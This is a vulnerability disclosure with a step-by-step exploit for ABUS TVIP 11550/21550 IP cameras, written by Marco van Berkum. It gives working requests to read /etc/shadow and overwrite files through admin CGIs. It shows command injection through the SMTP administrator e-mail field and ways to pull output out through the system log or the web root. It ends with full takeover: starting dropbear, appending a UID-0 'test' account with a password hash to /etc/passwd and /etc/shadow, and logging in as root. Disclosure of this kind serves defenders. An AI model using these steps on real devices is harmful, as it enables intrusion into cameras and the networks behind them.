ABUS TVIP 11550/21550 File Read / File Upload / Command Execution

`Title : ABUS TVIP 11550/21550 Multiple vulnerabilities (and possibly  
other ABUS cams)  
Author : Marco van Berkum  
  
- Summary  
- Arbitrary file read  
- Arbitrary file upload  
- Arbitrary command excution (input validation bug)  
- How it's totally compromised including ssh root login.  
  
- Summary  
  
The ABUS 11550 and 21550 are IP Webcams that can be configured via a  
webinterface.  
While experimenting multiple vulnerabilities where discovered that give  
rootaccess  
to the Operating System, debian-linux, of the camera. The webserver of the  
camera is  
BOA and runs as root.  
  
Although these vulnerabilities can ONLY be exploited when logged in as  
admin, they  
can still be considered critical since the camera can be used to gain  
access to the  
network behind it. I did not find a way past the login screen without  
proper credentials (yet).  
  
- Arbitrary file read  
  
When logged in as admin its possible to read any file on the filesystem since  
the webserver is running as root.  
  
http://ipcamera/cgi-bin/admin/fileread?READ.filePath=/etc/shadow  
  
- Arbitrary file upload  
  
Similar to the fileread CGI there also is a filewrite CGI that can  
(over)write any  
file.  
  
http://ipcamera/cgi-bin/admin/filewrite?SAVE.filePath=/tmp/file%26SAVE  
  
- Arbitrary command execution (input validation bug)  
  
The camera has several htmlforms to configure services such as a FTPclient  
and  
a SMTPclient. These are used to notify users and upload videos when the  
camera's motion detection detects movement. These htmlforms can be used to  
execute  
arbitrary commands as root. I've found bugs in the SMTP and FTP forms but  
probably  
other forms will contain the same bug (unchecked).  
  
Exploit:  
In the configuration -> smtp general part is a webform where an  
administrator's  
emailadress can be filled out (Administrator e-Mail address).  
The form lacks checking metacharacters such as ;, | and `.  
When a test email from this form is sent the webinterface executes ssmtp -t  
<your_input>.  
So it is possible to 'break' the commandline by using `ls` for instance.  
After  
submitting  
the command via the 'testbutton' this will be the output:  
  
smtp: Connect to host  
  
smtp: MAIL FROM:<backup>  
SMTP server error  
................SMTP Test Failed...........  
  
Which means we are situated in a directory that contains a backup directory.  
  
`pwd` also works  
  
smtp: Connect to host  
  
smtp: MAIL FROM:</opt/cgi/admin>  
SMTP server error  
................SMTP Test Failed...........  
  
Unfortunately this only outputs the first line of the commandline output.  
But, we can work around this :)  
  
The system also contains a System Log function that shows output of the  
systemlog.  
Now, if we want a little more output than just the first line, for instance  
"ls /" we can do it by filling out `ls /|logger` which sends the output  
to the system logfile. Which can then be viewed from the webinterface.  
  
Oct 8 14:35:15 <notice > root: bin  
Oct 8 14:35:15 <notice > root: dev  
Oct 8 14:35:15 <notice > root: etc  
Oct 8 14:35:15 <notice > root: include  
Oct 8 14:35:15 <notice > root: init  
Oct 8 14:35:15 <notice > root: lib  
Oct 8 14:35:15 <notice > root: linuxrc  
Oct 8 14:35:15 <notice > root: mnt  
Oct 8 14:35:15 <notice > root: opt  
Oct 8 14:35:15 <notice > root: proc  
Oct 8 14:35:15 <notice > root: root  
Oct 8 14:35:15 <notice > root: sbin  
Oct 8 14:35:15 <notice > root: smtp_test.sh  
Oct 8 14:35:15 <notice > root: sys  
Oct 8 14:35:15 <notice > root: tag_replace.sh  
Oct 8 14:35:15 <notice > root: tmp  
Oct 8 14:35:15 <notice > root: usr  
Oct 8 14:35:15 <notice > root: var  
Oct 8 14:35:15 <notice > root: web  
  
Getting the correct commandline output can also be obtained by redirecting  
it to a readble file on de webserver itself by doing `ls -alR  
/>/web/html/lsoutput.txt`  
It can then be accessed by the url http://ipcamera/lsoutput.txt  
  
- How it's totally compromised including ssh root login.  
  
I did it in a few steps. First did a `ls -alR/>/web/html/lsoutput.txt` to  
see what was on the filesystem and noticed that dropbear is available on the  
system. Dropbear is a SSHserver/Client :)  
So, I started it with the `/etc/dropbear/dropbear` command.  
  
Then I took a look at the /etc/shadowfile and noticed that user root had  
no password,  
so ssh'ing in was not an option, yet. So had to create a user, did it the  
following way:  
  
`echo "test:x:0:0:test:/tmp:/bin/sh">>/etc/passwd`  
and  
`echo  
"test:$1$/DqZS5Cm$PUeCTPpYIrGQnxsZtsfDY1:12963:0:99999:7:::">>/etc/shadow`  
  
So, now we can login as user test with password test. User test has UID 0,  
thus root.  
  
test@ipcamera's password:  
Welcome to  
  
_____ __ ___ __ ___ _ _ _  
| ___| / \ / __ \ / \ | _ \ / \ \ \ / /  
| |___ / /\ \ | /__\ \ / /\ \ | | \ | / /\ \ \ V /  
| ___|| |__| | | _ / | |__| | | | | | | |__| | \ /  
| | | __ | | | \ \ | __ | | |_/ / | __ | | |  
|_| |_| |_| |_| \_\|_| |_| |___ / |_| |_| |_|  
  
For further information check:  
http://www.GM.com/  
  
  
  
BusyBox v1.1.3 (2010.05.10-11:54+0000) Built-in shell (ash)  
Enter 'help' for a list of built-in commands.  
  
[test]#  
  
Voila ;)  
  
Also, its possible to mount a samba or nfsshare via the webinterface and  
copy files  
that way.  
  
Just my two cents  
Marco van berkum  
  
  
  
`